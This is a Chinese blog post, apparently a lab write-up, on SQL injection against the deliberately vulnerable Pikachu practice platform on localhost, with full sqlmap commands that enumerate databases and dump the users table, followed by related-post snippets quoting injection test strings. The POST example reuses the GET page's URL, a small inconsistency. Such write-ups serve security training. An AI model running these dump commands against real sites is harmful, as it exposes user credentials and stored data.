pikachu练习——sql注入

最新推荐文章于 2024-03-28 17:06:02 发布
最新推荐文章于 2024-03-28 17:06:02 发布
阅读量2.1k 收藏
点赞数
分类专栏: 练习 文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoaaao/article/details/122754052
版权

一、字符型注入(get)

(1)随便输入name,获取url:

因pikachu登录需要用户名及密码,所以查询网页cookie绕过:

(2)使用sqlmap查找该网站数据库:

python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --dbs --batch

        获取到pikachu和information_schema两个数据库

(3)对可疑数据库pikachu查询表:

python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D pikachu --tables --batch

(4)对可疑表users查询dump数据:

python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D pikachu --tables  -T users --dump --batch

        成功获取用户登录信息

 二、数字型注入(post)

(1)随便选一个提交,在fn+f12的网络中查看post请求的原始参数:

(2)使用sqlmap查询数据库:

/*** 在post请求的sql注入中,需要另加一个参数 --data="post请求"。 ***/

python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --data="id=1&submit=查询" --dbs --batch

 

(3)查询可疑数据库的表以及可疑表中dump信息 :

python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --data="id=1&submit=查询" -D pikachu --tables --batch

python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --data="id=1&submit=查询" -D pikachu --tables -T users --dump --batch

         

        成功获取用户信息

 

 

 

haoaaao
关注
专栏目录
PIKACHU靶场 ——字符和数字SQL注入练习
PICACHU+++的博客
04-03 877
进入靶场可以看见一个输入框,所以现在里面判断注入点类,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符SQL注入漏洞。
Pikachu漏洞练习平台之SQL注入
ranuy阮的博客
02-27 1999
0x00 Pikachu Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 项目地址:https://github.com/zhuifengshaonianhanlu/pikachu 0x01 数字注入(post) 界面如下 使用burpsuite抓包 POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1 Host: 127.0...
pikachusql注入
weixin_38720471的博客
01-07 3794
** 1原理 ** SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 2数字注入 让id=true,从而使sql语句在查询时,id可以查询所有值 3字符注入 3.1原理:首先用 ’ 判断是否存在字符注入的漏洞 。因为在sql语句中 多个’会造成sql语句错误(结合sql语句),若加单引号后显示sql运行错误 ,则存在此
pikachu靶场之SQL注入
最新发布
2201_75766364的博客
03-28 1008
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
pikachuSQL注入
qq_58091216的博客
11-04 2315
SQL注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
pikachu-sql注入
Resets_的博客
04-01 585
pikachu sql数字注入,字符注入
Pikachu漏洞练习平台实验——SQL注入
m0_73826804的博客
02-22 2812
SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。比如我们期望用户输入整数的id,但是用户输入了上图中下面的语句,这是条能被正常执行的SQL语句,导致表中的数据都会输出。
sql注入pikachu盲注练习
windStudyer的专栏
05-21 804
sql注入pikachu之盲注练习
SQL注入进阶之1宽字节注入攻击(Pikachu漏洞练习平台)
ISNS的博客
02-29 4508
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 宽字节注入攻击可以说是SQL注入的进阶攻击方式,在我之前列出的学习计划体系中,前面的union联合查询注入攻击、布尔盲注、报错注入、时间盲注这几种常见的SQL注入方式,在我之前的博客中已经分析过了,那么今天在下面这些进阶的SQL注入方式中,要翻牌的就是宽字节注入。 原理讲解 接下来的讲解,将以问...
攻防系列——pikachu靶场通关练习
weixin_43140411的博客
10-23 2029
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
pikachu-sql注入练习
mogdemo的博客
04-14 333
pikachu-sql注入练习 注入思路 判断闭合方式 --> 判断sql注入 --> 测试绕过 -->oder by查字段数 --> select 1,2,3确定显示位 --> 查数据库名 -->查表名 --> 列名 --> 内容(用户名密码) 数字注入(post) 选择数字查询,url不发生传参变化,说明是post方法提交数据。 使用...
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2723
Pikachu-----Sql Inject(SQL注入
PIKACHU--SQL注入
鲨鱼辣椒的博客
05-17 1703
SQL Inject(SQL)概述 注入漏洞在全球漏洞排行榜上一直高居榜首而注入漏洞中首当其冲的就是数据库注入漏洞,SQL注入漏洞主要的成因是子啊数据交互中,前端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL注入流程 注入点探测 手动方式:手工构造SQL语句进行注入点发现 自动方式:采用自动扫描工具,自动进行注入点发现 信息获取 通过
PiKachuSql (SQL注入)通关 2022
av11566的博客
04-18 8354
遇到一个待测点: 1、判断是否有注入(判断是否未严格校验)-->第一要素 1)可控参数的改变能否影响页面显示结果。 2)输入的SQL语句是否能报错-能通过数据库的报错,看到数据库的一些语句痕迹(select username, password from user where id = 4 and 0#3)输入的SQL语句能否不报错-我们的语句能够成功闭合 2、什么类注入 3、语句是否能够被恶意修改--第二个要素 4、是否能够成功执行-->第三个要素 5、获取我们想要的数据。
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2716
pikachu靶场通关之sql注入
pikachu平台之sql注入
qq_42728977的博客
12-24 725
参考链接 原理 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 基本流程 1.2SQL注入攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL注入测试语句进行注入点发现 第二步:信息获取 通过...
pikachu-sql注入
y995zq的博客
01-11 898
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到 SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞: 1.对传进SQL语句里面的变量进行过
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 5137
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
Pikachu-Sql Inject
baynk的博客
11-19 1031
0x00 Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后...
pikachu靶场通关sql注入
08-10
Pikachu靶场中,SQL注入是一种常见的攻击方法。参与者可以通过注入恶意代码来绕过应用程序的安全性,从而获取敏感信息或者对数据库进行修改。在注入的过程中,可以使用不同的技术和payload来实现攻击。例如,数字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值